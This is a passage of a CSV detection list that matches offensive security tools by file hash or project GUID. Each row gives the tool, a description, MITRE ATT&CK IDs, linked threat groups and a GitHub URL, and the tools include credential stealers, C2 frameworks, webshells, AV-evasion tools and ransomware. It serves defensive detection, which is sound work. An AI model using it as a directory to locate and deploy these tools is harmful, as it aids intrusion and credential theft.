"*59c066aafc12f8aafd28d1b1667c5e3c8bf50ade2fa0660e18b484aeb1dd8fae*",".{0,1000}59c066aafc12f8aafd28d1b1667c5e3c8bf50ade2fa0660e18b484aeb1dd8fae.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","27209"
"*59c2e7b63bbfe6dbabdd384973817bc26433c9c90ce755a9f7ec2627a949f65b*",".{0,1000}59c2e7b63bbfe6dbabdd384973817bc26433c9c90ce755a9f7ec2627a949f65b.{0,1000}","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","#filehash","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","27210"
"*59c75b410227497fbe9522a50dae6b52db1a222f946064d796ac10b918e5e4e6*",".{0,1000}59c75b410227497fbe9522a50dae6b52db1a222f946064d796ac10b918e5e4e6.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","27211"
"*59ce9c0deee4a9514bca45b542d680baa7d7b927fef94c54ac5a0433db480629*",".{0,1000}59ce9c0deee4a9514bca45b542d680baa7d7b927fef94c54ac5a0433db480629.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","27212"
"*59d6b8ce447b8168f7d17f18a1584dd54c543fed2b35a5b76c49c034e20dffe2*",".{0,1000}59d6b8ce447b8168f7d17f18a1584dd54c543fed2b35a5b76c49c034e20dffe2.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","27213"
"*59e73ffcbdfd1f90f12b40c912c742837eb3e6be0333e35586db1d6de7d44d45*",".{0,1000}59e73ffcbdfd1f90f12b40c912c742837eb3e6be0333e35586db1d6de7d44d45.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27215"
"*59eb20e71e9284537d2626e19a2c12a633c7568d115d939e95cfc51ee1f53c61*",".{0,1000}59eb20e71e9284537d2626e19a2c12a633c7568d115d939e95cfc51ee1f53c61.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","27216"
"*59eb7b55ff7eb7ca02c78730093c973be826c5516dc32c9ffedd8682e4642264*",".{0,1000}59eb7b55ff7eb7ca02c78730093c973be826c5516dc32c9ffedd8682e4642264.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","27217"
"*59ec5f3ac06dc1e082a3f28441105f4c65384a4360070c725452311ffc6f856b*",".{0,1000}59ec5f3ac06dc1e082a3f28441105f4c65384a4360070c725452311ffc6f856b.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","27218"
"*59f031b1f9b71d2166f1b281b3ffbe40e3985d3a739d1761e59434a0032bf5c6*",".{0,1000}59f031b1f9b71d2166f1b281b3ffbe40e3985d3a739d1761e59434a0032bf5c6.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","27219"
"*59fb3de646d1f2643ed4d11d87e98fa71452f8f4fd623c177f5b626f5b507c27*",".{0,1000}59fb3de646d1f2643ed4d11d87e98fa71452f8f4fd623c177f5b626f5b507c27.{0,1000}","offensive_tool_keyword","hotkeyz","Hotkey-based keylogger for Windows","T1056.001","TA0006  - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/yo-yo-yo-jbo/hotkeyz","1","0","#filehash","N/A","9","1","21","1","2024-10-17T17:50:19Z","2024-06-03T21:23:16Z","27220"
"*59ffa43ceae2aa7212a08e03110b3081b7d19b7e0eff508291b2a56be2f67a35*",".{0,1000}59ffa43ceae2aa7212a08e03110b3081b7d19b7e0eff508291b2a56be2f67a35.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","27221"
"*59ffd99e0fe7d354d185bacf11949be89fa86a88f40ac4773f33e784279b31cd*",".{0,1000}59ffd99e0fe7d354d185bacf11949be89fa86a88f40ac4773f33e784279b31cd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27222"
"*5a0976fef89e32ddcf62c790f9bb4c174a79004e627c3521604f46bf5cc7bea2*",".{0,1000}5a0976fef89e32ddcf62c790f9bb4c174a79004e627c3521604f46bf5cc7bea2.{0,1000}","offensive_tool_keyword","Invoke-WCMDump","PowerShell script to dump Windows credentials from the Credential Manager Invoke-WCMDump enumerates Windows credentials in the Credential Manager and then extracts available information about each one. Passwords are retrieved for Generic type credentials. but can not be retrived by the same method for Domain type credentials. Credentials are only returned for the current user","T1003 - T1003.003 - T1003.001 - T1552","TA0006 - TA0006 - TA0006 - TA0006","N/A","N/A","Credential Access","https://github.com/peewpw/Invoke-WCMDump","1","0","#filehash","N/A","10","8","722","134","2017-12-12T00:46:33Z","2017-12-09T21:36:59Z","27224"
"*5a0bd791d08f5f9871a1b2fa7f1aea81d0aeb90c7df95fe0534d3faac1847e74*",".{0,1000}5a0bd791d08f5f9871a1b2fa7f1aea81d0aeb90c7df95fe0534d3faac1847e74.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","#filehash","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","27225"
"*5a0c1ccb6b02b2bfa1d84be0b8055274b884f0d58447b5b3eaf19d9c5197c19e*",".{0,1000}5a0c1ccb6b02b2bfa1d84be0b8055274b884f0d58447b5b3eaf19d9c5197c19e.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27226"
"*5A0FBE0D-BACC-4B97-8578-B5B27567EEA7*",".{0,1000}5A0FBE0D\-BACC\-4B97\-8578\-B5B27567EEA7.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","0","#GUIDproject","N/A","8","3","251","34","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z","27228"
"*5a145c3bcbe90fdd067206d68009d5ba36f8d0bea8f1d6bcbf0a0f05005edf38*",".{0,1000}5a145c3bcbe90fdd067206d68009d5ba36f8d0bea8f1d6bcbf0a0f05005edf38.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27229"
"*5a1a2900ec634bb1651fff9d542491221449754289ad5a58791ee3104ccef752*",".{0,1000}5a1a2900ec634bb1651fff9d542491221449754289ad5a58791ee3104ccef752.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27232"
"*5a1f9b0e-9f7c-4673-bf16-4740707f41b7*",".{0,1000}5a1f9b0e\-9f7c\-4673\-bf16\-4740707f41b7.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","#GUIDproject","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","27233"
"*5a21e58cf302bd2ff1cd95bceaaae6f22151ac15af52ea1249b2e0ddfffe704f*",".{0,1000}5a21e58cf302bd2ff1cd95bceaaae6f22151ac15af52ea1249b2e0ddfffe704f.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27234"
"*5a2845a19dc310535eec5c74dd770db258e90160ea63e5cc9d97ab87de8081ff*",".{0,1000}5a2845a19dc310535eec5c74dd770db258e90160ea63e5cc9d97ab87de8081ff.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27235"
"*5a2b42f395e836e2de823d8a19acf85ebc580b9e6b44270eee5af0ba023b91e2*",".{0,1000}5a2b42f395e836e2de823d8a19acf85ebc580b9e6b44270eee5af0ba023b91e2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27237"
"*5a2e947aace9e081ecd2cfa7bc2e485528238555c7eeb6bcca560576d4750a50*",".{0,1000}5a2e947aace9e081ecd2cfa7bc2e485528238555c7eeb6bcca560576d4750a50.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","27238"
"*5a3ae8d1bf88a4415c293623ca868e718bf2addbfc88953267bed9c9cf57c2ad*",".{0,1000}5a3ae8d1bf88a4415c293623ca868e718bf2addbfc88953267bed9c9cf57c2ad.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27239"
"*5A403F3C-9136-4B67-A94E-02D3BCD3162D*",".{0,1000}5A403F3C\-9136\-4B67\-A94E\-02D3BCD3162D.{0,1000}","offensive_tool_keyword","Pspersist","Dropping a powershell script at %HOMEPATH%\Documents\windowspowershell\ that contains the implant's path and whenever powershell process is created the implant will executed too.","T1546 - T1546.013 - T1053 - T1053.005 - T1037 - T1037.001","TA0003","N/A","N/A","Persistence","https://github.com/TheD1rkMtr/Pspersist","1","0","#GUIDproject","N/A","10","1","85","24","2023-08-02T02:27:29Z","2023-02-01T17:21:38Z","27240"
"*5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b*",".{0,1000}5a40f11a99d0db4a0b06ab5b95c7da4b1c05b55a99c7c443021bff02c2cf93145c53ff5b.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/zha0gongz1/DesertFox","1","0","#filehash","N/A","10","10","125","26","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z","27241"
"*5a48220efa4415ca4f849a8b483695de2fac0297f61239afeded512944b929e5*",".{0,1000}5a48220efa4415ca4f849a8b483695de2fac0297f61239afeded512944b929e5.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","27242"
"*5a4dd116f4daaedde86acb94e662e4bd4840fdccad203f9888bdab0390ae6954*",".{0,1000}5a4dd116f4daaedde86acb94e662e4bd4840fdccad203f9888bdab0390ae6954.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","27243"
"*5a53c9fc89a0583f7b7edf4e92d910223c0923d8686d2e336361a486d029b0a1*",".{0,1000}5a53c9fc89a0583f7b7edf4e92d910223c0923d8686d2e336361a486d029b0a1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27244"
"*5a56d5caa6847d283e27207b727ce27a852b8a567cacd7b29f6073a1458e494e*",".{0,1000}5a56d5caa6847d283e27207b727ce27a852b8a567cacd7b29f6073a1458e494e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27245"
"*5a56f8eaba6bff8c910ecc16e1592fd6df370670b71d20038239a58a9d6dc9de*",".{0,1000}5a56f8eaba6bff8c910ecc16e1592fd6df370670b71d20038239a58a9d6dc9de.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27246"
"*5a57366f655b5bf5b500769847d1b055d3847065703803d509ff2fa83837ff3a*",".{0,1000}5a57366f655b5bf5b500769847d1b055d3847065703803d509ff2fa83837ff3a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27247"
"*5a58a6413acaa3d6bf69b32764e90ff162d2b8173e97376007557b2a23d90eb1*",".{0,1000}5a58a6413acaa3d6bf69b32764e90ff162d2b8173e97376007557b2a23d90eb1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27249"
"*5a66c739cbd2e664a77e6dbbdcb318ca7a99e1a98e9314b0a90ea20378cdb9bd*",".{0,1000}5a66c739cbd2e664a77e6dbbdcb318ca7a99e1a98e9314b0a90ea20378cdb9bd.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","27252"
"*5A6F942E-888A-4CE1-A6FB-1AB8AE22AFFA*",".{0,1000}5A6F942E\-888A\-4CE1\-A6FB\-1AB8AE22AFFA.{0,1000}","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","0","#GUIDproject","N/A","9","2","159","27","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z","27254"
"*5a70e9ca5bcdc934d1451843186cbd70a5869e3d1694a5a81a177fcc5ca37d05*",".{0,1000}5a70e9ca5bcdc934d1451843186cbd70a5869e3d1694a5a81a177fcc5ca37d05.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27255"
"*5a7f1bf78dd911a486125a32312c46ddcf8ea6523498a49c7cbba44c25097028*",".{0,1000}5a7f1bf78dd911a486125a32312c46ddcf8ea6523498a49c7cbba44c25097028.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","27257"
"*5a86428ea0c5d6424b44518fe411e2a8c795d201f4a6df3b77b04f2af8f2a911*",".{0,1000}5a86428ea0c5d6424b44518fe411e2a8c795d201f4a6df3b77b04f2af8f2a911.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27258"
"*5a89f9df7621ef8eac8832f7397c55559d71cee04a798474683e7e0019f5ee49*",".{0,1000}5a89f9df7621ef8eac8832f7397c55559d71cee04a798474683e7e0019f5ee49.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","27259"
"*5a8f375901afcfe1a4152984d4cb6c1d6c0084964fe76b689bd7bdef6a83b959*",".{0,1000}5a8f375901afcfe1a4152984d4cb6c1d6c0084964fe76b689bd7bdef6a83b959.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","27260"
"*5a958c89-6327-401c-a214-c89e54855b57*",".{0,1000}5a958c89\-6327\-401c\-a214\-c89e54855b57.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","0","#GUIDproject","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","27262"
